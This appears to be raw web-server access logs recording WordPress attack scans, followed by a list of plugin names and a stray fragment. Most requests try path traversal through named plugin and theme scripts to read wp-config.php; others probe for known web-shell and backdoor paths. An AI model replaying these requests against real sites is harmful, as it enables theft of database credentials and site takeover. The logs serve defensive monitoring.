80.66.76.37 - - [12/Feb/2022:13:57:20 -0700] "GET /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3709
80.66.76.37 - - [12/Feb/2022:13:57:24 -0700] "GET /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 828
80.66.76.37 - - [12/Feb/2022:13:57:25 -0700] "GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1073
80.66.76.37 - - [12/Feb/2022:13:57:27 -0700] "GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1461
80.66.76.37 - - [12/Feb/2022:13:57:28 -0700] "GET /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 734
80.66.76.37 - - [12/Feb/2022:13:57:30 -0700] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1619
80.66.76.37 - - [12/Feb/2022:13:57:32 -0700] "GET /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 468
80.66.76.37 - - [12/Feb/2022:13:57:33 -0700] "GET /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1395
80.66.76.37 - - [12/Feb/2022:13:57:34 -0700] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1695
80.66.76.37 - - [12/Feb/2022:13:57:36 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3524
80.66.76.37 - - [12/Feb/2022:13:57:40 -0700] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3354
80.66.76.37 - - [12/Feb/2022:13:57:44 -0700] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1372
80.66.76.37 - - [12/Feb/2022:13:57:46 -0700] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1118
80.66.76.37 - - [12/Feb/2022:13:57:47 -0700] "GET /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3506
80.66.76.37 - - [12/Feb/2022:13:57:51 -0700] "GET /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1095
80.66.76.37 - - [12/Feb/2022:13:57:53 -0700] "GET /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 605
80.66.76.37 - - [12/Feb/2022:13:57:54 -0700] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2847
80.66.76.37 - - [12/Feb/2022:13:57:57 -0700] "GET /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1203
80.66.76.37 - - [12/Feb/2022:13:57:59 -0700] "GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 9225
80.66.76.37 - - [12/Feb/2022:13:58:08 -0700] "GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 11117
80.66.76.37 - - [12/Feb/2022:13:58:20 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 7164
80.66.76.37 - - [12/Feb/2022:13:58:28 -0700] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 5759
80.66.76.37 - - [12/Feb/2022:13:58:34 -0700] "GET /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 983
80.66.76.37 - - [12/Feb/2022:13:58:35 -0700] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3830
80.66.76.37 - - [12/Feb/2022:13:58:39 -0700] "GET /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 7272
80.66.76.37 - - [12/Feb/2022:13:58:47 -0700] "GET /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 7313
80.66.76.37 - - [12/Feb/2022:13:58:55 -0700] "GET /wp-includes/functions.php?file=..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 5204
80.66.76.37 - - [12/Feb/2022:13:59:00 -0700] "GET /wp-content/themes/salient/down.php?path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1575
80.66.76.37 - - [12/Feb/2022:13:59:02 -0700] "GET /wp-content/themes/salient/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1955
80.66.76.37 - - [12/Feb/2022:13:59:05 -0700] "GET /wp-content/themes/salient/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3197
80.66.76.37 - - [12/Feb/2022:13:59:08 -0700] "GET /wp-content/themes/salient/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3036
80.66.76.37 - - [12/Feb/2022:13:59:12 -0700] "GET /wp-content/themes/salient/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1767
80.66.76.37 - - [12/Feb/2022:13:59:14 -0700] "GET /wp-content/themes/salient/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2462
80.66.76.37 - - [12/Feb/2022:13:59:17 -0700] "GET /wp-content/themes/salient/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3871
80.66.76.37 - - [12/Feb/2022:13:59:21 -0700] "GET /wp-content/themes/salient/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3440
80.66.76.37 - - [12/Feb/2022:13:59:25 -0700] "GET /wp-content/themes/salient/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2749
80.66.76.37 - - [12/Feb/2022:13:59:28 -0700] "GET /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 5518
80.66.76.37 - - [12/Feb/2022:13:59:34 -0700] "GET /wp-content/themes/salient/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3589
80.66.76.37 - - [12/Feb/2022:13:59:38 -0700] "GET /wp-content/themes/salient/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1732


advanced-dewplayer
ajax-store-locator-wordpress_0
allwebmenus-wordpress-menu-plugin
annonces
apptha-slider-gallery
aspose-cloud-ebook-generator
aspose-doc-exporter
bookx
brandfolder
candidate-application-form
cloudsafe365-for-wp
crayon-syntax-highlighter
db-backup
disclosure-policy-plugin
dm-albums
dukapress
dzs-videogallery
filedownload
google-mp3-audio-player
gracemedia-media-player
gwolle-gb
hb-audio-gallery-lite
history-collection
ibs-mappro
image-export
imdb-widget
jquery-mega-menu
justified-image-grid
livesig
localize-my-post
mac-photo-gallery
mail-masta
mailz
membership-simplified-for-oap-members-only
myflash
mygallery
old-post-spinner
page-flip-image-gallery
photocart-link
pica-photo-gallery
pictpress
plugin-newsletter
post-recommendations-for-wordpress
rb-agency
recent-backups
relocate-upload
robotcpa
s3bubble-amazon-s3-html-5-video-with-adverts
ultimate
se-html5-album-audio-player
sell-downloads
sf-booking
simple-download-button-shortcode
simple-fields
simple-image-manipulator
site-editor
site-import
sniplets
spicy-blogroll
tera-charts
thecartpress
thinkun-remind
tinymce-thumbnail-gallery
ungallery
website-contact-form-with-file-upload
wechat-broadcast
wordtube
wp-custom-pages
wp-ecommerce-shop-styling
wp-filemanager
wp-imagezoom
wp-lytebox
wp-miniaudioplayer
wp-mon
wp-publication-archive
wp-source-control
wp-swimteam
wp-table
wp-with-spritz
wpeasystats
wptf-image-gallery
zingiri-forum
zingiri-web-shop

Fox RSF 


135.181.139.51 - - [12/Feb/2022:04:13:52 -0700] "GET /wp-load.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1855 
135.181.139.51 - - [12/Feb/2022:04:13:56 -0700] "GET /style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 6277 
135.181.139.51 - - [12/Feb/2022:04:14:02 -0700] "GET /wp-admin/style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 7117 
135.181.139.51 - - [12/Feb/2022:04:14:11 -0700] "GET /s_e.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 2970 
135.181.139.51 - - [12/Feb/2022:04:14:15 -0700] "GET /s_ne.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3208 
135.181.139.51 - - [12/Feb/2022:04:14:19 -0700] "GET /1index.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:32:47 -0700] "GET /wp-load.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 9229 
107.182.128.14 - - [12/Feb/2022:04:33:00 -0700] "GET /style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1179 
107.182.128.14 - - [12/Feb/2022:04:33:01 -0700] "GET /wp-admin/style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 841 
107.182.128.14 - - [12/Feb/2022:04:33:04 -0700] "GEtT /s_e.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 865 
107.182.128.14 - - [12/Feb/2022:04:33:13 -0700] "GET /s_ne.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 861 
107.182.128.14 - - [12/Feb/2022:04:33:20 -0700] "GET /1index.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:33:32 -0700] "GET /3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:33:45 -0700] "GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:34:07 -0700] "GET /wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 301 - "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:34:08 -0700] "GET /wp-content/mu-plugins-old/?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
107.182.128.14 - - [12/Feb/2022:04:34:18 -0700] "GET /radio.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 774 
107.182.128.14 - - [12/Feb/2022:04:34:24 -0700] "GET /lock360.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 960 
107.182.128.14 - - [12/Feb/2022:04:34:40 -0700] "GET /wp-load.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 862 
107.182.128.14 - - [12/Feb/2022:04:34:56 -0700] "GET /old-index.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1547 
107.182.128.14 - - [12/Feb/2022:04:35:04 -0700] "GET /xmrlpc.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 14356 
65.108.99.3 - - [12/Feb/2022:08:32:59 -0700] "GET /wp-load.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 11496 
65.108.99.3 - - [12/Feb/2022:08:33:12 -0700] "GET /style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 29202 
65.108.99.3 - - [12/Feb/2022:08:33:28 -0700] "GET /wp-admin/style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 31864 
65.108.99.3 - - [12/Feb/2022:08:33:44 -0700] "GET /s_e.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 31536 
65.108.99.3 - - [12/Feb/2022:08:33:59 -0700] "GET /s_ne.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 27117 
65.108.99.3 - - [12/Feb/2022:08:34:14 -0700] "GET /1index.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:34:29 -0700] "GET /3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:34:44 -0700] "GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:35:00 -0700] "GET /wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 301 - "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:35:15 -0700] "GET /radio.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 34269 
65.108.99.3 - - [12/Feb/2022:08:35:30 -0700] "GET /lock360.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 27421 
65.108.99.3 - - [12/Feb/2022:08:35:45 -0700] "GET /wp-load.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 19450 
65.108.99.3 - - [12/Feb/2022:08:36:00 -0700] "GET /old-index.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 7329 
65.108.99.3 - - [12/Feb/2022:08:36:08 -0700] "GET /xmrlpc.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1381 
65.108.99.3 - - [12/Feb/2022:08:36:10 -0700] "GET /xmlrpcs.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3358 
65.108.99.3 - - [12/Feb/2022:08:36:13 -0700] "GET /wp-admin.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3610 
65.108.99.3 - - [12/Feb/2022:08:36:17 -0700] "GET /qindex.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 4382 
65.108.99.3 - - [12/Feb/2022:08:36:22 -0700] "GET /doc.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1904 
65.108.99.3 - - [12/Feb/2022:08:36:24 -0700] "GET /wp_wrong_datlib.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:36:26 -0700] "GET /beence.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:36:31 -0700] "GET /ups.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3500 
65.108.99.3 - - [12/Feb/2022:08:36:35 -0700] "GET /wp-signin.php?dizo&ping HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 6394 
65.108.99.3 - - [12/Feb/2022:08:36:42 -0700] "GET /media-admin.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 11937 
65.108.99.3 - - [12/Feb/2022:08:36:54 -0700] "GET /export.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:06 -0700] "GET /wp-content/export.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:17 -0700] "GET /wp-includes/wp-class.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 5837 
65.108.99.3 - - [12/Feb/2022:08:37:23 -0700] "GET /wp-includes/wp-atom.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:26 -0700] "GET /wp-includes/images/css.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:28 -0700] "GET /wp-includes/css/css.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:31 -0700] "GET /defau1t.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:34 -0700] "GET /css.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1178 
65.108.99.3 - - [12/Feb/2022:08:37:36 -0700] "GET /moduless.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:37:44 -0700] "GET /wp-booking.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 13121 
65.108.99.3 - - [12/Feb/2022:08:37:58 -0700] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 13155 
65.108.99.3 - - [12/Feb/2022:08:38:11 -0700] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 9138 
65.108.99.3 - - [12/Feb/2022:08:38:21 -0700] "GET /wp-includes/css/wp-config.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 7889 
65.108.99.3 - - [12/Feb/2022:08:38:29 -0700] "GET /config.bak.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 7524 
65.108.99.3 - - [12/Feb/2022:08:38:37 -0700] "GET /wp-content/themes/config.bak.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3339 
65.108.99.3 - - [12/Feb/2022:08:38:40 -0700] "GET /legion.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1282 
65.108.99.3 - - [12/Feb/2022:08:38:42 -0700] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:38:45 -0700] "GET /wp-plugins.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 582 
65.108.99.3 - - [12/Feb/2022:08:38:46 -0700] "GET /gank.php.PhP HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1371 
65.108.99.3 - - [12/Feb/2022:08:38:47 -0700] "GET /wp-content/db-cache.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1808 
65.108.99.3 - - [12/Feb/2022:08:38:49 -0700] "GET /archives.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:38:53 -0700] "GET /xindex.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3328 
65.108.99.3 - - [12/Feb/2022:08:38:56 -0700] "GET /defau11.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
65.108.99.3 - - [12/Feb/2022:08:38:58 -0700] "GET /wp-content/outcms.php?up HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2300 
65.108.99.3 - - [12/Feb/2022:08:39:00 -0700] "GET /system_log.php?bala=up HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3793 
65.108.99.3 - - [12/Feb/2022:08:39:04 -0700] "GET /wp-backup-sql-302.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2820 
65.108.99.3 - - [12/Feb/2022:08:39:08 -0700] "GET /error.php?phpshells HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 5569 
65.108.99.3 - - [12/Feb/2022:08:39:14 -0700] "GET /ALFA_DATA HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 6783 
65.108.99.3 - - [12/Feb/2022:08:39:21 -0700] "GET /alfacgiapi HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2375 
65.108.99.3 - - [12/Feb/2022:08:39:23 -0700] "GET /cgialfa HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1046 
65.108.99.3 - - [12/Feb/2022:08:39:25 -0700] "GET /.well-known/ALFA_DATA HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3155 
65.108.99.3 - - [12/Feb/2022:08:39:28 -0700] "GET /.well-known/alfacgiapi HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 831 
65.108.99.3 - - [12/Feb/2022:08:39:29 -0700] "GET /.well-known/cgialfa HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2015 
65.108.99.3 - - [12/Feb/2022:08:39:32 -0700] "GET /wp-content/uploads/ALFA_DATA HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3339 
65.108.99.3 - - [12/Feb/2022:08:39:35 -0700] "GET /wp-content/uploads/alfacgiapi HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2726 
65.108.99.3 - - [12/Feb/2022:08:39:38 -0700] "GET /wp-content/uploads/cgialfa HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2173 
65.108.99.3 - - [12/Feb/2022:08:39:41 -0700] "GET /wp-includes/ALFA_DATA HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3069 
65.108.99.3 - - [12/Feb/2022:08:39:44 -0700] "GET /wp-includes/alfacgiapi HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 2105 
65.108.99.3 - - [12/Feb/2022:08:39:47 -0700] "GET /wp-includes/cgialfa HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3028 
65.108.99.3 - - [12/Feb/2022:08:39:50 -0700] "GET /wp-admin/ALFA_DATA HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 5309 
65.108.99.3 - - [12/Feb/2022:08:39:56 -0700] "GET /wp-admin/alfacgiapi HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 4522 
149.202.15.196 - - [12/Feb/2022:10:56:49 -0700] "GET /wp-load.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:56:55 -0700] "GET /style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1907 
